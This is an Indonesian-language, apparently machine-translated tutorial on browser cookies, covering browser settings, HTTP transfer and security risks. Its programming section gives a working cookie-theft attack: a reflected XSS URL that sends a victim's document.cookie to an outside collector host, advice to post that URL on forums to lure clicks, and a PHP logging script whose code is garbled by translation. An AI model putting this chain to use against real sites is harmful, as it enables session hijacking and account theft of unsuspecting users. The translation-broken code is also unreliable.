Cookie berarti makanan penutup kecil dalam bahasa Inggris, dan kita selalu dapat melihat kata ini di browser. Bagaimana makanan bisa dikaitkan dengan browser? Saat Anda menelusuri situs web yang telah Anda masuki sebelumnya, Anda mungkin melihat pesan berikut di halaman web: Halo XX, rasanya sangat bersahabat, seperti makan makanan penutup kecil. Ini sebenarnya dicapai dengan mengakses file di host Anda, jadi file ini disebut juga cookie. Ingin tahu semua tentang cookie? Lihatlah di bawah ini!
1. Memahami Cookie Objek yang berlaku: Pembaca pemula
Cookie adalah file teks kecil yang disimpan situs web di mesin Anda saat Anda menelusuri situs web. Ini mencatat ID pengguna, kata sandi, halaman web yang dijelajahi, waktu yang dihabiskan, dan informasi lainnya, kapan Anda datang ke situs web lagi, situs web mempelajari informasi relevan Anda dengan membaca cookie, dan dapat mengambil tindakan yang sesuai, seperti menampilkan slogan menyambut Anda di halaman, atau mengizinkan Anda menjelajah secara langsung tanpa memasukkan ID atau kata sandi Anda dan banyak lagi . Anda dapat melihat semua cookie yang disimpan ke komputer Anda dengan memilih "Pengaturan/Lihat File" di tab "Umum" pada "Alat/Opsi Internet" di IE. File-file ini biasanya diberi nama dalam format user@domain , di mana user adalah nama pengguna lokal Anda dan domain adalah nama domain dari situs web yang Anda kunjungi. Jika Anda menggunakan browser NetsCape, itu disimpan di "C:PROGRAMFILESNETSCAPEUSERS". Berbeda dengan IE, NETSCAPE menggunakan file Cookie untuk mencatat cookie semua situs web.
Untuk memastikan keamanan Internet kita perlu mengatur cookie dengan tepat. Buka tab "Privasi" di "Alat/Opsi Internet" (perhatikan bahwa pengaturan ini hanya ada di IE6.0, versi IE lainnya dapat mengklik "Tingkat Khusus" di tab "Keamanan" pada tombol "Alat/Opsi Internet" untuk membuat penyesuaian sederhana) untuk menyesuaikan tingkat keamanan cookie. Biasanya, Anda dapat menyesuaikan penggeser ke posisi "sedang-tinggi" atau "tinggi". Sebagian besar situs forum memerlukan penggunaan informasi cookie. Jika Anda tidak pernah mengunjungi tempat-tempat ini, Anda dapat menyesuaikan tingkat keamanan ke "Blokir Semua Cookie". Jika Anda hanya ingin memblokir cookie dari situs web tertentu, Anda dapat mengklik tombol "Edit" untuk menambahkan situs web yang ingin Anda blokir ke dalam daftar. Pada opsi tombol "Lanjutan", Anda dapat mengatur cookie pihak pertama dan cookie pihak ketiga. Cookie pihak pertama adalah cookie dari situs web yang Anda jelajahi, dan cookie pihak ketiga bukanlah cookie yang dikirimkan kepada Anda oleh situs web tempat Anda berada. browsing. Biasanya Anda harus memilih "Tolak" untuk cookie pihak ketiga, seperti yang ditunjukkan pada Gambar 1. Jika Anda perlu menyimpan cookie, Anda dapat menggunakan fungsi "Impor dan Ekspor" IE, buka "File/Impor dan Ekspor", dan ikuti petunjuknya.
Sebagian besar konten dalam cookie dienkripsi, jadi bagi kami tampaknya ini hanyalah kombinasi huruf dan angka yang tidak berarti. Hanya pengendali CGI server yang mengetahui arti sebenarnya. Kita dapat melihat lebih banyak konten melalui beberapa perangkat lunak. Informasi cookie yang dilihat menggunakan perangkat lunak Cookie Pal ditunjukkan pada Gambar 2. Ini memberi kita konten Server, Kedaluwarsa, Nama, Nilai dan opsi lainnya. Diantaranya, Server adalah situs web yang menyimpan cookie, Kedaluwarsa mencatat waktu dan masa pakai cookie, dan bidang Nama dan nilai adalah data spesifik (surat kabar ini memiliki pengenalan rinci tentang perangkat lunak ini di Edisi 10, Halaman 42).
Alamat unduhan: http://www.cbifamily.com/down/200411/cfnetwork/cp1.exe .
2. Proses pengiriman cookie Objek yang berlaku: Pembaca perantara Ketika mereka mengetikkan URL situs Web di bilah alamat browser, browser akan mengirimkan permintaan untuk membaca halaman web ke situs Web dan menampilkan hasilnya di monitor. Saat ini, halaman web mencari file Cookie yang disetel oleh situs web Amazon di komputer Anda. Jika ditemukan, browser akan mengirimkan data dalam file Cookie bersama dengan URL yang dimasukkan sebelumnya ke server Amazon. Ketika server menerima data cookie, server akan mengambil ID Anda, catatan belanja Anda, preferensi pribadi, dan informasi lainnya dalam database-nya, mencatat konten baru, dan menambahkannya ke database dan file cookie. Jika tidak ada cookie yang terdeteksi atau informasi cookie Anda tidak sesuai dengan informasi di database, berarti Anda menjelajahi situs web untuk pertama kalinya, dan program CGI server akan membuat informasi ID baru untuk Anda dan menyimpannya di database.
Cookie ditransfer menggunakan informasi header HTTP dalam kode halaman web. Cookie dapat ditransfer dengan setiap permintaan halaman web yang dibuat oleh browser, misalnya, saat browser membuka atau menyegarkan halaman web. Server menambahkan cookie ke informasi header HTTP halaman web, dan mengirimkan data halaman web kembali ke browser Anda. Browser akan memilih apakah akan menyimpan data ini berdasarkan pengaturan cookie di komputer Anda. Jika browser tidak mengizinkan penyimpanan cookie, data akan hilang setelah browser ditutup. Waktu penyimpanan cookie di komputer Anda berbeda-beda, yang ditentukan oleh pengaturan server. Cookie memiliki atribut Kedaluwarsa (masa berlaku), yang menentukan waktu penyimpanan cookie. Server dapat mengubah waktu penyimpanan cookie dengan mengatur nilai bidang Kedaluwarsa. Jika atribut ini tidak disetel, cookie hanya valid saat menjelajahi web. Jika Anda menutup browser, cookie ini akan hilang secara otomatis. Biasanya, cookie berisi bidang Server, Kedaluwarsa, Nama, dan Nilai. Hanya bidang Nama dan Nilai yang berguna bagi server. Isi bidang Kedaluwarsa dan lainnya hanya untuk memberi tahu browser cara memproses Cookie ini.
3. Implementasi pemrograman cookie Objek yang berlaku: Pembaca tingkat lanjut Sebagian besar bahasa pemrograman web menyediakan dukungan untuk Cookie. Seperti JavaScript, VBScript, Delphi, ASP, SQL, PHP, C#, dll. Dalam bahasa pemrograman berorientasi objek ini, penggunaan pemrograman Cookie pada dasarnya serupa. Proses umumnya adalah: pertama-tama buat objek Cookie (Objek), lalu gunakan fungsi kontrol untuk menetapkan, membaca, menulis, dan operasi lainnya ke Cookie. Jadi bagaimana cara mendapatkan informasi sensitif di cookie pengguna lain melalui kode? Pengenalan singkat berikut ini.
Metode ini memiliki dua langkah utama. Pertama, temukan situs web yang Anda perlukan untuk mengumpulkan cookie, menganalisisnya, dan membuat URL, kemudian mengkompilasi kode PHP untuk mengumpulkan cookie dan meletakkannya di situs web yang dapat Anda kendalikan, tanpa menyadarinya kode dapat dieksekusi setelah pengguna mengklik URL yang Anda buat. Mari kita lihat proses implementasi spesifiknya di bawah ini.
1. Analisis dan buat URL.
Pertama buka situs web tempat kami ingin mengumpulkan cookie. Di sini kami berasumsi itu adalah http://www.XXX.net . Masuk ke situs web dan masukkan nama pengguna "<A1>" ( tanpa tanda kutip) untuk menganalisa data dan menangkap paket, dapatkan kode berupa "http://www.XXX.net/txl/login/login.pl?username=<A1>&passwd=&ok.x =28&ok.y=6", ganti "<A1>" Coba lagi untuk "<script>alert(document.cookie)</script>"; jika eksekusi berhasil, mulailah membuat URL: "http://www .XXX.net/txl/login/login.pl?username=< script>window.open(" http://www.cbifamily.org/cbi.php?"%2Bdocument.cookie)</script>&passwd=&ok .x=28&ok.y=6 ". Diantaranya, http:///www.cbifamily.org/cbi.php adalah script pada host tertentu yang dapat Anda kendalikan. Perlu dicatat bahwa "%2B" adalah pengkodean URL dari simbol "+", karena "+" akan diperlakukan sebagai spasi. URL dapat diposting di forum untuk mendorong orang lain mengkliknya.
2. Siapkan script PHP.
Fungsi script ini adalah untuk mengumpulkan file Cookie.
<?php
$info = getenv("QUERY_STRING");
jika ($info) {
$fp = fopen("info.txt","a");
fwrite($fp,$info."n");
fclose($fp);
}
header("Lokasi: http://www.downcodes.com ");
?>
4. Masalah keamanan cookie Objek yang berlaku: Semua pembaca yang ingin aman saat online
1. Penipuan
cookie Cookie mencatat informasi seperti ID akun pengguna dan kata sandi. Jika dikirimkan secara online, enkripsi MD5 biasanya digunakan. Sekalipun informasi terenkripsi disadap oleh beberapa orang dengan motif tersembunyi di Internet, mereka tidak akan dapat memahaminya karena yang mereka lihat hanyalah huruf dan angka yang tidak berarti. Namun yang menjadi permasalahan sekarang adalah orang yang mencegat cookie tidak perlu mengetahui arti dari string tersebut. Mereka hanya perlu mengirimkan cookie orang lain ke server dan jika berhasil lolos verifikasi, mereka dapat berpura-pura menjadi identitas korban dan masuk ke situs web. Metode ini disebut spoofing cookie. Prasyarat untuk spoofing cookie adalah adanya kerentanan dalam program verifikasi server, dan penipu ingin mendapatkan informasi cookie dari orang yang ditiru. Sangat sulit bagi program verifikasi situs web saat ini untuk mengecualikan semua login ilegal. Misalnya, bahasa yang digunakan untuk menulis program verifikasi mungkin memiliki celah. Selain itu, sangat mudah untuk mendapatkan cookie orang lain. Anda dapat melakukannya dengan menulis sepotong kecil kode dalam bahasa yang mendukung cookie (lihat detail di metode 3). dapat dikumpulkan. Jika forum mengizinkan kode HTML atau mengizinkan penggunaan tag Flash, Anda dapat menggunakan teknologi ini untuk mengumpulkan kode Cookie dan menaruhnya di forum, kemudian memberikan postingan topik yang menarik dan menulis konten yang menarik, dan Anda dapat dengan cepat mengumpulkan sejumlah besar dari Cookie. Di forum, banyak kata sandi orang yang dicuri dengan metode ini. Adapun cara mencegahnya, saat ini belum ada obat khusus. Kami hanya dapat menggunakan metode perlindungan biasa. Jangan gunakan kata sandi penting di forum, jangan gunakan fungsi IE untuk menyimpan kata sandi secara otomatis, dan cobalah untuk tidak masuk ke situs web. di mana Anda tidak mengetahui detailnya.
2. Bahaya tersembunyi kode Flash
Ada fungsi getURL() di Flash. Flash dapat menggunakan fungsi ini untuk membuka halaman web tertentu secara otomatis. Oleh karena itu, hal ini dapat mengarahkan Anda ke situs web yang berisi kode berbahaya. Misalnya, saat Anda menikmati animasi Flash yang indah di komputer Anda, kode dalam bingkai animasi mungkin diam-diam tersambung ke Internet dan membuka halaman sangat kecil yang berisi kode khusus. Halaman ini dapat mengumpulkan cookie Anda dan melakukan hal lain, seperti menanam Trojan di mesin Anda atau bahkan memformat hard drive Anda, dll. Situs web tidak dapat melarang perilaku Flash ini karena ini merupakan perilaku internal file Flash. Yang bisa kita lakukan adalah mencoba membuka firewall jika Anda menjelajah secara lokal. Jika firewall meminta Anda untuk tidak mengetahui paket data yang dikirim, yang terbaik adalah memblokirnya. Jika Anda ingin menikmatinya di Internet, yang terbaik adalah mencari beberapa situs web besar yang terkenal.